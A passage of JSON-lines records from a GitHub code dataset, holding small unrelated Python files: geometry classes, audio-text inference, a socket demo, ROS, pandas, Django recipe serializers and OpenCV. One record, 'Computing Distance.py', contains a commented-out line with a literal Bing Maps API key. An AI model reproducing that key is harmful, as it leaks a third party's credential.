self.width + c)\n return f'Your Triangle perimeter is is {p}'\n\nfig1 = Figure(4, 2)\nrectangle = Rectangle(5, 10)\ntriangle = RightTriangle(3, 4)\n\nprint(\"Rectangle Information:\")\nprint(rectangle.perimeter())\nprint(rectangle.calculate_perimeter())\nprint(\"Right Triangle Information:\")\nprint(rectangle.area())\nprint(rectangle.calculate_area())\nprint(triangle.calculate_p())\nprint(triangle.calculate_s())\n","repo_name":"m0v1e/Kontrolinis-2023-06-09","sub_path":"Uzduotis Nr.2 OOP#2.py","file_name":"Uzduotis Nr.2 OOP#2.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72270720807","text":"import argparse\nfrom pathlib import Path\n\nimport librosa\nfrom zsvision.zs_utils import load_json_config\nimport numpy as np\nimport torch\nfrom transformers import AutoTokenizer\n\nimport utils\n\n\ndef load_model(config, ckpt_path, device):\n model = utils.init_obj_from_str(config)\n checkpoint = torch.load(ckpt_path, map_location=\"cpu\")\n model.load_state_dict(checkpoint[\"state_dict\"])\n model = model.to(device)\n model.eval()\n return model\n\n\ndef encode_audio(model, audio, device, sample_rate=32000):\n target_sr = model.audio_encoder.sample_rate\n if isinstance(audio, str) and Path(audio).exists():\n waveform = librosa.core.load(audio, sr=target_sr)[0]\n elif isinstance(audio, (np.ndarray, torch.Tensor)):\n if isinstance(audio, torch.Tensor):\n audio = audio.numpy()\n waveform = librosa.core.resample(audio, sample_rate, target_sr)\n waveform = torch.as_tensor(waveform).to(device)\n audio_emb = model.encode_audio(**{\n \"waveform\": waveform.unsqueeze(0),\n \"wave_length\": torch.tensor([len(waveform)]),\n }).cpu().numpy()\n return audio_emb\n\n\ndef encode_text(model, text_tokenizer, text, device, max_length):\n if isinstance(text, str):\n text = [text]\n token = dict(text_tokenizer(\n text,\n padding=\"max_length\",\n max_length=max_length,\n truncation=True, return_tensors=\"pt\")\n )\n for k, v in token.items():\n token[k] = v.to(device)\n text_emb = model.encode_text(**token)\n text_emb = text_emb.cpu().numpy()\n return text_emb\n\n\ndef load_blat(ckpt_dir, device):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n ckpt_dir = Path(ckpt_dir)\n config = load_json_config(ckpt_dir / \"config.json\")\n\n model = load_model(config[\"model\"], ckpt_dir / \"model.pth\", device)\n\n text_tokenizer = AutoTokenizer.from_pretrained(config[\"text_tokenizer\"][\"type\"])\n max_length = config[\"text_tokenizer\"][\"max_length\"]\n return model, text_tokenizer, max_length\n\n\ndef infer_sim(args):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model, text_tokenizer, max_length = load_blat(args.ckpt_dir, device)\n \n with torch.no_grad():\n audio_emb = encode_audio(model, args.audio, device)\n text_emb = encode_text(model, text_tokenizer, args.text, device, max_length)\n\n at_sim = np.matmul(audio_emb, text_emb.T)\n\n print(f\"audio: {args.audio}\")\n for text, sim in zip(args.text, at_sim[0]):\n print(f\"text: {text}, similarity: {sim:.3f}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ckpt_dir\", type=str, required=True)\n parser.add_argument(\"--audio\", type=str, default=\"\")\n parser.add_argument(\"--text\", type=str, nargs=\"+\", default=[\"\"])\n\n args = parser.parse_args()\n infer_sim(args)\n","repo_name":"wsntxxn/BLAT","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2207590173","text":"import socket\nimport time\n\n# 1 买手机\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n# 2 插手机卡\nserver.bind(('127.0.0.1', 9094)) # bind传入的是一个元祖\n\n# 3 开机\nserver.listen(5) # 代表最大挂起的链接数\n\nconn, addr = server.accept()\n\nres1 = conn.recv(1)\nprint('第一次', res1)\n\ntime.sleep(6)\nres2 = conn.recv(1024)\nprint('第二次', res2)\n","repo_name":"heartangle/python","sub_path":"python_deep_learn/05 粘包现象分析/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28301523667","text":"#!/usr/bin/env python\n\nimport rospy\nimport message_filters\nfrom barbot.msg import Location, Euler\nfrom geometry_msgs.msg import PointStamped\n\n\nclass Observer(object):\n def __init__(self, state_topic=\"calibrated_state\", imu_topic=\"calibrated_imu\", location_topic=\"calibrated_location\"):\n\n self.state_pub = rospy.Publisher(state_topic, Location, queue_size=1)\n\n imu_sub = rospy.Subscriber(imu_topic, Euler, self.imu_callback)\n location_sub = rospy.Subscriber(location_topic, PointStamped, self.location_callback)\n\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n\n \n def location_callback(self, location_data):\n self.x = location_data.point.x\n self.y = location_data.point.y\n\n\n def imu_callback(self, imu_data):\n self.theta = imu_data.heading\n msg = Location()\n\n msg.pose.x = self.x\n msg.pose.y = self.y\n msg.pose.theta = self.theta\n\n self.state_pub.publish(msg)\n\nif __name__ == '__main__':\n rospy.init_node(\"observer\")\n controller = Observer()\n rospy.spin()\n","repo_name":"VasuAgrawal/BarBot","sub_path":"Controller/src/barbot/scripts/Observer.py","file_name":"Observer.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31391932795","text":"import pandas as pd \nimport os\n\n\nclass DataETL():\n # initialize class and its properties\n def __init__(self):\n self.df_users = None\n self.df_tickets = None\n self.df_organization = None \n self.df_combined = None\n self.dataframe_list = None\n pd.set_option('display.max_columns', None)\n\n # load data from file\n def data_extract(self):\n dir_path=os.path.dirname(os.path.realpath(__file__))\n users_path=os.path.join(dir_path, 'users.json')\n tickets_path = os.path.join(dir_path, 'tickets.json')\n organizations_path = os.path.join(dir_path, 'organizations.json')\n \n self.df_users = pd.read_json(users_path)\n self.df_tickets = pd.read_json(tickets_path)\n self.df_organizations = pd.read_json(organizations_path)\n self.dataframe_list = [self.df_users, self.df_tickets, self.df_organizations]\n\n # add suffix to the column names \n def df_add_suffix(self):\n self.df_users = self.df_users.add_suffix('_users')\n self.df_tickets = self.df_tickets.add_suffix('_tickets')\n self.df_organizations = self.df_organizations.add_suffix('_orgs')\n\n # merge all three dataframe on their common keys \n def combine_dataframe(self):\n # combine user and organization on organization id (use outer merge to )\n df_user_org = pd.merge(self.df_users, self.df_organizations, left_on='organization_id_users', right_on='_id_orgs', how='outer')\n # combine tickets on submitter id \n self.df_combined = pd.merge(df_user_org, self.df_tickets, left_on='_id_users', right_on='submitter_id_tickets', how='outer')\n # convert floating data type to strings \n for col in self.df_combined.columns:\n if pd.api.types.is_float_dtype(self.df_combined[col]):\n self.df_combined.loc[self.df_combined[col].notna(), col] = self.df_combined.loc[self.df_combined[col].notna(), col].astype(int).astype(str)\n # flattern lists inside columns \n self.df_combined['tags_users'] = self.df_combined['tags_users'].apply(lambda x: ', '.join(map(str, x)) if isinstance(x, list) else str(x))\n return self.df_combined \n # dataETL\n def data_ETL(self):\n self.data_extract()\n self.df_add_suffix()\n self.df_combined = self.combine_dataframe()\n return self.df_combined\n # def data_search(self):\n # self.search_function(self.df_combined)\n\n # showing data frame\n def show_data(self):\n print(self.df_combined)\n\n\nmain = DataETL()\nmain.data_ETL()\n#main.show_data()","repo_name":"111userNotFound111/SearchEngineProjectFinal","sub_path":"my_package/data_ETL.py","file_name":"data_ETL.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6779161736","text":"import pandas as pd\nfrom geopy.geocoders import Nominatim\nimport pickle\nfrom geopy.distance import geodesic\nimport numpy as np\nimport requests\nimport json\nprint ('Importing Libraries')\ndf=pd.read_csv(\"cordinates.csv\")\n\nlist_of_places = []\n\nclass Node():\n\tdef __init__(self,name,nodeid):\n\t\tself.children = dict()\n\t\tself.node_child = dict()\n\t\tself.name = name\n\t\tself.time = 0\n\t\tself.latitude = 0\n\t\tself.longitude = 0\n\t\tself.nodeid = nodeid\n\n\tdef add_children(self,new_location,distance):\n\t\tif len(self.children)<5:\n\t\t\tself.children[new_location] = distance\n\t\t\tself.node_child[new_location] = root.node_child[new_location]\n\t\telse:\n\t\t\ttemp=str(max(self.children,key=self.children.get))\n\t\t\tif self.children[temp]>distance:\n\t\t\t\tdel(self.children[temp])\n\t\t\t\tdel(self.node_child[temp])\n\t\t\t\tself.children[new_location] = distance\n\t\t\t\tself.node_child[new_location] = root.node_child[new_location]\n\t\t\telse:\n\t\t\t\tpass;\n\n\n\n\tdef add_root_child(self,new_location,nodeid):\n\t\tself.children[new_location] = (0,0)\n\t\t#Child Node is created\n\t\tself.node_child[new_location] = Node(new_location,nodeid)#Node Constructor Called\n\nroot = Node('Root',-1)#Dummy Node\n\nfor i in range(len(df)):\n\tlist_of_places.append(df.loc[i]['location'])\n\t#print (df.loc[i]['location'])\n\troot.add_root_child(df.loc[i]['location'],i)\n\nfor i in list_of_places:\n\tprint(i)\n\tfor j in list_of_places:\n\t\tif i==j:\n\t\t\tpass\n\t\telse:\n\n\t\t\tlat_i = df[df['location']==i]['latitude']\n\t\t\tlong_i = df[df['location']==i]['longitude']\n\n\t\t\tlat_j = df[df['location']==j]['latitude']\n\t\t\tlong_j = df[df['location']==j]['longitude']\n\n\t\t\tlon_i = long_i.tolist()\n\t\t\tlon_j = long_j.tolist()\n\n\t\t\tlati = lat_i.tolist()\n\t\t\tlatj = lat_j.tolist()\n\n\n\n\t\t\t#x=(lati[0],lon_i[0])\n\t\t\t#y=(latj[0],lon_j[0])\n\t\t\t#print (x,':',y)\n\t\t\t# key = 'Aq8LlcKLQyS0vyUEhI7Zg-KXeH7SZeJ9o8vJtrZ92_fi_NCcS3W8FY_jgh53RdaI'\n\t\t\t# print( \"Sending request to bing maps API\" )\n\t\t\t# URL = 'https://dev.virtualearth.net/REST/v1/Routes/DistanceMatrix?origins='\n\t\t\t# URL = URL + str(lati[0]) + ',' + str( lon_i[0]) + '&destinations=' + str( latj[0] ) + ',' + str(lon_j[0] ) + '&travelMode=driving&timeUnit=seconds' + '&key=' + key\n\t\t\t#\n\t\t\t# data = requests.get( URL ).text\n\t\t\t# json_data = json.loads( data )\n\t\t\t# print(\"done requesting\")\n\t\t\t# obj = json_data['resourceSets'][0]['resources'][0]['results'][0]\n\t\t\t# dis = obj['travelDistance']\n\n\t\t\tx = (lati[0], lon_i[0])\n\t\t\ty = (latj[0], lon_j[0])\n\t\t\t# print (x,':',y)\n\t\t\tdis = geodesic( x, y ).miles\n\n\t\t\t#root.node_child[i].add_children( j, dis )\n\n\t\t\troot.node_child[i].add_children(j,dis)\n\n\t#print(root.node_child[i].children)\n\n\n\nadj_mat = []\n\nfor i in range(len(list_of_places)):\n\tX = root.node_child[list_of_places[i]].children\n\ty = np.zeros(len(list_of_places)).tolist()\n\n\tfor keys,value in X.items():\n\t\tkey_id = list_of_places.index(keys)\n\t\ty[key_id] = value\n\tadj_mat.append(y)\n\n\nfor i in range(len(adj_mat)):\n\tfor j in range(len(adj_mat)):\n\t\tif adj_mat[i][j] > 0:\n\t\t\tadj_mat[j][i] = adj_mat[i][j]\n\n\nprint ('Saving the adjancy matrix........')\nimport pickle\nwith open('adj_mat.pkl','wb') as fp:\n\tpickle.dump(adj_mat,fp,-1)\n\n\n\n\n\n\n\n#root.node_child[j].add_children(i,dis,10)\n","repo_name":"Atishya-Gupta/Optimal-Path-Finder-in-Hyderabad","sub_path":"Computing Distance.py","file_name":"Computing Distance.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72186673128","text":"class Character(object):\n def __init__(self, name, inventory, abilities, stats, health):\n self.name = name\n self.inventory = inventory\n self.abilities = abilities\n self.stats = stats\n self.health = health\n\n def attack(self, Enemy):\n Enemy.damage()\n self.health -= 25\n def inventory(self, health):\n self.health()\n print(\"You have\")\n\nplayer = Character(\"Willy\", \"Gun\", \"Fast Sprint\", \"Kills\", \"100\",)\n\n\nprint(player.name)\nprint(player.inventory)\nprint(player.abilities)\nprint(player.stats)\nprint(player.health)\nprint(player.attack)","repo_name":"ioqv/CSE","sub_path":"Edgar Lopez -Class Character.py","file_name":"Edgar Lopez -Class Character.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2924426813","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.http import HttpResponseRedirect\nfrom stormapp.deadbodies.views import home_view, about_storm, about_team, sample_map_view, retrieve_body, report_dead_body, view_all_dead_body\nfrom stormapp.reliefops.views import view_all_relief_ops\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.conf import settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# deadbodies\nurlpatterns += patterns('',\n url(r'^index/$', home_view),\n url(r'^view_map/$', sample_map_view),\n url(r'^report/$', report_dead_body),\n url(r'^view_all/$', view_all_dead_body),\n url(r'^retrieve/$', view_all_dead_body),\n url(r'^about/storm/$', about_storm),\n url(r'^about/team/$', about_team),\n url(r'^$', lambda x: HttpResponseRedirect('/index/')),\n)\n\n# reliefops\nurlpatterns += patterns('',\n url(r'^relief/$', view_all_relief_ops),\n)\n\nurlpatterns += staticfiles_urlpatterns()\n\nurlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )","repo_name":"njncalub/storm","sub_path":"stormapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4023028131","text":"import cv2 as cv\nimport numpy as np\nimg=cv.imread('pics/gnr.jpg')\nblank=np.ones((img.shape[0],img.shape[1],3),dtype='uint8')\nblank[0:250,250:500]=0,0,0\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('gray',gray)\nedge=cv.Canny(img,50,75)\ncv.imshow('edge',edge)\nblur=cv.GaussianBlur(img,(5,5),cv.BORDER_DEFAULT)\nbluredge=cv.Canny(blur,50,75)\ncv.imshow('bluredge',bluredge)\ncontours,hierarchy=cv.findContours(edge,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\ncontoursblur,hierarchy=cv.findContours(bluredge,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\nprint(len(contours))\nprint(len(contoursblur))\nret,thresh=cv.threshold(gray,100,125,cv.THRESH_BINARY)\ncontoursthrs,hierarchy=cv.findContours(thresh,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\nprint(len(contoursthrs))\ncv.imshow('thresh',thresh)\ncv.drawContours(blank,contoursthrs,-1,(0,255,0),1)\ncv.imshow('drawnContours',blank)\ncv.waitKey(0)","repo_name":"anirbanhati/cv2programming","sub_path":"contour.py","file_name":"contour.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23777080859","text":"from HelperClasses.User import User\n\n\nclass TweetData:\n \"\"\"Extends the Tweet class with additional functionality and properties\"\"\"\n\n def __init__(self, tweet):\n self.baseData = tweet\n self.text = \"\"\n self.getAllText()\n self.comments = []\n self.getcomments()\n self.user = User(tweet)\n\n def getAllText(self):\n try:\n self.text = self.baseData.retweeted_status.full_text\n except:\n self.text = self.baseData.full_text\n\n \"\"\"Gets all comments for this tweet\"\"\"\n def getcomments(self):\n entities = self.baseData.entities.get('hashtags')\n self.comments.append(\"test\")\n","repo_name":"benwschulz/TrendScraper","sub_path":"HelperClasses/TweetData.py","file_name":"TweetData.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16440294152","text":"# Ku-band H2CO 2 cm (and friends)\n# keywords defined at www.gb.nrao.edu/~fghigo/gbtdoc/config/configparams_rev1.doc\n#\n# CONFIGURATION:\n# Bandwidth Polarization Level Number of Number of Lags - Approximate Resolution\n# (MHz) Cross-Products Sampling Spectral Beams Low Medium High\n# BW Pol Lev Windows Beams Channels / resolution\n# 50 No 9 4 2 4096 - 12.2070 kHz 4096 - 12.2070 kHz 4096 - 12.2070 kHz\n\nreceiver = 'Rcvr12_18' # select Ku-band receiver\nbeam = 'B12' # use two beams\nobstype = 'Spectroscopy'\nbackend = 'VEGAS'\nswmode = \"tp\" # set switching scheme (tp(total power with cal), tp_nocal, sp(switched power with cal), sp_nocal )\nswtype = \"none\" # for frequency switching; not used for tp mode\nswper = 1.0 # one second cycle for switching\nswfreq = 0.0, 0.0 # for freq switching\ntint = 0.5 # integration time (for 4 quadrants, 1.2-40 sec. Important to avoid smearing)\nvlow = 0\nvhigh = 0\nvframe = \"lsrk\" # LSR - kinematic is the \"normal\" definition (don't use dynamic)\nvdef = \"Radio\" # radio (optical is also acceptable, but not the norm for Galactic observations)\nnoisecal = \"lo\"\npol = \"Circular\" # should this be linear?\nnchan = \"high\"\nvegas.vpol='self'\nrestfreq = [ {\"restfreq\": 14488.479, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 14511., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 14465., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 13778.80, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 13801., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 13756., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 14151.61, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 14105.61, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n {\"restfreq\": 12625., 'bandwidth': 1250., \"res\":92.0, \"delatfreq\": 0},\n ]\n","repo_name":"adamginsburg/GBT15B-129_CMZ_H2CO","sub_path":"observing_scripts/H2CO_2cm_KUSetup_GC.py","file_name":"H2CO_2cm_KUSetup_GC.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30394209163","text":"import torch\nimport numpy as np\nfrom collections import OrderedDict\nfrom my_bert_model import BertConfig, BertModel, BertGenerationEncoderDecoder, BertGenerationEncoder, BertGenerationDecoder\nfrom torch.nn import Parameter\n\nDEVICE = 'cpu'\n\ndef load_my_state_dict(model, state_dict):\n own_state = model.state_dict()\n for name, param in state_dict.items():\n if name not in own_state:\n continue\n if isinstance(param, Parameter):\n # backwards compatibility for serialized parameters\n param = param.data\n own_state[name].copy_(param)\n\n\nconfig = BertConfig()\nmodel_encoder = BertGenerationEncoder(config)\nconfig.is_decoder = True\nmodel_decoder = BertGenerationDecoder(config)\nmy_model = BertGenerationEncoderDecoder(model_encoder, model_decoder)\nkeys = my_model.state_dict()\n\n'''\nprint(type(keys))\nfor key in keys:\n #print(keys[key], key, '\\n')\n print(key, '\\n')\n'''\n\ninput_ids = torch.tensor([[1, 1, 0, 3, 7], [2, 4, 6, 8, 10]]).to(DEVICE)\noutputs = my_model(input_ids=input_ids, decoder_input_ids=input_ids)\n\n\n'''\nconfig = BertConfig()\nconfig.is_decoder = True\nmodel = torch.load('bert_data/bert-base-uncased-pytorch_model.bin')\nmodel2 = OrderedDict([k.replace('LayerNorm.gamma', 'LayerNorm.weight'), v] for k, v in model.items())\nmodel = OrderedDict([k.replace('LayerNorm.beta', 'LayerNorm.bias'), v] for k, v in model2.items())\nmy_model = BertForSequenceClassification(config, num_labels=2)\nkeys = my_model.state_dict()\nprint(type(keys))\nfor key in keys:\n #print(keys[key], key, '\\n')\n print(key, '\\n')\n\n#load_my_state_dict(my_model, state_dict=model)\n#keys = my_model.state_dict()\n#print(type(keys))\n#for key in keys:\n #print(keys[key], key, '\\n')\n #print(key[0], '\\n')\n'''","repo_name":"zhengfengL/mybert","sub_path":"src/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12956695674","text":"import base64\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.files.base import ContentFile\nfrom rest_framework import serializers, status\n\nfrom recipe.models import (Favorites, Ingredient, IngredientAmount, Recipe,\n ShoppingCart, Subscription, Tag)\n\nUser = get_user_model()\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор собственного класса пользователя\"\"\"\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = [\n 'id', 'username', 'email', 'first_name',\n 'last_name', 'is_subscribed', 'password'\n ]\n read_only_fields = ['id', 'is_subscribed']\n extra_kwargs = {\n 'password': {'write_only': True},\n }\n depth = 1\n\n def get_is_subscribed(self, obj):\n \"\"\"Получение специального поля:\n подписан ли текущий пользователь\n на запрашиваемого пользователя\n \"\"\"\n\n if hasattr(self.context['request'], 'user'):\n user = self.context['request'].user\n else:\n user = None\n\n if (user is None or not user.is_authenticated):\n return False\n return (user.subscriber.filter(to_follow=obj).count() > 0)\n\n def create(self, validated_data):\n \"\"\"Переопределение создания пользователя\n для хеширования пароля\n \"\"\"\n\n user = User(\n email=validated_data['email'],\n username=validated_data['username'],\n first_name=validated_data['first_name'],\n last_name=validated_data['last_name'],\n )\n user.set_password(validated_data['password'])\n user.save()\n return user\n\n\nclass TagSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор тега\"\"\"\n class Meta:\n model = Tag\n fields = '__all__'\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор ингредиента\"\"\"\n class Meta:\n model = Ingredient\n fields = '__all__'\n\n\nclass IngredientAmountSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор промежуточного класса\n для отображения информации о количестве ингредиента в рецепте\n \"\"\"\n id = serializers.IntegerField(source='ingredient.id')\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit'\n )\n\n class Meta:\n model = IngredientAmount\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\n# From gist.github.com/yprez/7704036\nclass Base64ImageField(serializers.ImageField):\n \"\"\"Сериализатор для дешифрации изображения из base64\"\"\"\n\n def to_internal_value(self, data):\n if ((isinstance(data, str) or isinstance(data, bytes))\n and data.startswith('data:image') and (';base64,' in data)):\n # base64 encoded image - decode\n format, imgstr = data.split(';base64,') # format ~= data:image/X,\n ext = format.split('/')[-1] # guess file extension\n\n try:\n decoded_file = base64.b64decode(imgstr)\n except TypeError:\n self.fail('invalid_image')\n\n data = ContentFile(decoded_file, name=imgstr[12] + '.' + ext)\n\n return super(Base64ImageField, self).to_internal_value(data)\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор рецепта\"\"\"\n author = UserSerializer(read_only=True)\n tags = serializers.PrimaryKeyRelatedField(\n queryset=Tag.objects.all(),\n many=True\n )\n ingredients = IngredientAmountSerializer(\n many=True,\n source='ingredient_in_recipe_amount'\n )\n image = Base64ImageField()\n name = serializers.CharField(max_length=200)\n cooking_time = serializers.IntegerField(min_value=1)\n\n is_favorited = serializers.IntegerField(\n min_value=0,\n max_value=1,\n default=0,\n required=False,\n read_only=True\n )\n is_in_shopping_cart = serializers.IntegerField(\n min_value=0,\n max_value=1,\n default=0,\n required=False,\n read_only=True\n )\n\n class Meta:\n model = Recipe\n fields = (\n 'id', 'tags', 'author', 'ingredients',\n 'is_favorited', 'is_in_shopping_cart',\n 'name', 'image', 'text', 'cooking_time')\n read_only_fields = ['id', 'author',\n 'is_favorited', 'is_in_shopping_cart']\n\n def create(self, validated_data):\n \"\"\"Переопределенный класс создания:\n вложенные сериализаторы требуют обработки\n \"\"\"\n\n tags_list = validated_data.pop('tags')\n ingredient_list = validated_data.pop('ingredient_in_recipe_amount')\n instance = super().create(validated_data)\n\n for tag in tags_list:\n instance.tags.add(tag)\n for ing in ingredient_list:\n ing_am = IngredientAmount(\n recipe=instance,\n ingredient=Ingredient.objects.get(\n id=ing.get('ingredient').get('id')\n ),\n amount=ing.get('amount')\n )\n ing_am.save()\n return instance\n\n def update(self, instance, validated_data):\n \"\"\"Переопределенный класс обновления:\n вложенные сериализаторы требуют отдельного обновления\n \"\"\"\n\n tags_list = validated_data.pop('tags')\n ingredient_list = validated_data.pop('ingredient_in_recipe_amount')\n instance = super().update(instance, validated_data)\n\n existing_tags = instance.tags.all()\n for tag in existing_tags:\n if tag not in tags_list:\n instance.tags.remove(tag)\n for tag in tags_list:\n if tag not in existing_tags:\n instance.tags.add(tag)\n\n existing_ing = instance.ingredients.all()\n for ing in existing_ing:\n if ing not in ingredient_list:\n IngredientAmount.objects.get(\n recipe=instance,\n ingredient=ing\n ).delete()\n for ing in ingredient_list:\n ing_am, _ = IngredientAmount.objects.get_or_create(\n recipe=instance,\n ingredient=Ingredient.objects.get(\n id=ing.get('ingredient').get('id')\n ),\n amount=ing.get('amount')\n )\n return instance\n\n def to_representation(self, instance):\n \"\"\"Переопределенный класс отображения:\n вложенные сериализаторы требуют обработки для вывода\n \"\"\"\n\n response = super().to_representation(instance)\n tag_list = []\n for tag in instance.tags.all():\n tag_list.append(TagSerializer(tag).data)\n response['tags'] = tag_list\n\n response['image'] = instance.image.url\n\n user = self.context['request'].user\n\n if (not user.is_authenticated):\n response['is_favorited'] = False\n response['is_in_shopping_cart'] = False\n else:\n response['is_favorited'] = user.fav_list.filter(\n recipe=instance).count() > 0\n response['is_in_shopping_cart'] = user.cart_list.filter(\n recipe=instance).count() > 0\n\n return response\n\n\nclass RecipeShortenedToDisplaySerializer(serializers.ModelSerializer):\n \"\"\"Упрощенный сериализатор рецепта для отображения\"\"\"\n class Meta:\n model = Recipe\n fields = ('id', 'name', 'image', 'cooking_time')\n\n\nclass SubscriptionListToDisplaySerializer(UserSerializer):\n \"\"\"Сериализатор списка подписок\"\"\"\n recipes_count = serializers.IntegerField(\n default=0,\n read_only=True\n )\n recipes = RecipeShortenedToDisplaySerializer(\n read_only=True,\n many=True\n )\n is_subscribed = serializers.BooleanField(read_only=True)\n\n class Meta:\n model = User\n fields = [\n 'email', 'id', 'username', 'first_name', 'last_name',\n 'is_subscribed', 'recipes', 'recipes_count'\n ]\n\n def to_representation(self, instance):\n \"\"\"Переопределенный класс отображения:\n вложенные сериализаторы требуют обработки для вывода\n \"\"\"\n lim = self.context.get('recipes_limit')\n\n response = super().to_representation(instance)\n response['articles_count'] = instance.user_recipes.all().count()\n\n recipe_list = []\n\n if lim is not None:\n recipe_set = instance.user_recipes.all()[:lim]\n else:\n recipe_set = instance.user_recipes.all()\n for recipe in recipe_set:\n recipe_list.append(RecipeShortenedToDisplaySerializer(recipe).data)\n response['recipes'] = recipe_list\n\n return response\n\n\nclass SubscriptionSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор подписки\"\"\"\n class Meta:\n model = Subscription\n fields = ('user', 'to_follow')\n\n def validate(self, data):\n if (data['user'] == data['to_follow']):\n raise serializers.ValidationError(\n 'Вы не можете подписаться сами на себя.',\n status.HTTP_400_BAD_REQUEST\n )\n if (data['user'].subscriber.filter(\n to_follow=data['to_follow']).count() > 0):\n raise serializers.ValidationError(\n 'Вы уже подписаны на этого пользователя.',\n status.HTTP_400_BAD_REQUEST\n )\n return data\n\n def to_representation(self, instance):\n \"\"\"Переопределенный класс отображения\"\"\"\n\n response = super().to_representation(instance)\n response['to_follow'] = SubscriptionListToDisplaySerializer(\n instance.to_follow\n ).data\n\n return response\n\n\nclass FavoritesSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор избранного\"\"\"\n class Meta:\n model = Favorites\n fields = '__all__'\n\n def validate(self, data):\n \"\"\"Переопределен для проверки на уникальность\"\"\"\n if (data['user'].fav_list.filter(\n recipe=data['recipe']).count() > 0):\n raise serializers.ValidationError(\n 'Вы уже добавили этот рецепт в избранное.',\n status.HTTP_400_BAD_REQUEST\n )\n return data\n\n def to_representation(self, instance):\n \"\"\"Переопределенный класс отображения\"\"\"\n return RecipeShortenedToDisplaySerializer(instance.recipe).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор корзины\"\"\"\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate(self, data):\n \"\"\"Переопределен для проверки на уникальность\"\"\"\n if (data['user'].cart_list.filter(\n recipe=data['recipe']).count() > 0):\n raise serializers.ValidationError(\n 'Вы уже добавили этот рецепт в корзину.',\n status.HTTP_400_BAD_REQUEST\n )\n return data\n\n def to_representation(self, instance):\n \"\"\"Переопределенный класс отображения\"\"\"\n return RecipeShortenedToDisplaySerializer(instance.recipe).data\n","repo_name":"malyshevadv/foodgram-project-react","sub_path":"backend/foodgram/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":12256,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12032973885","text":"import datetime\n\nfrom django import forms\nfrom django.urls import reverse\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import 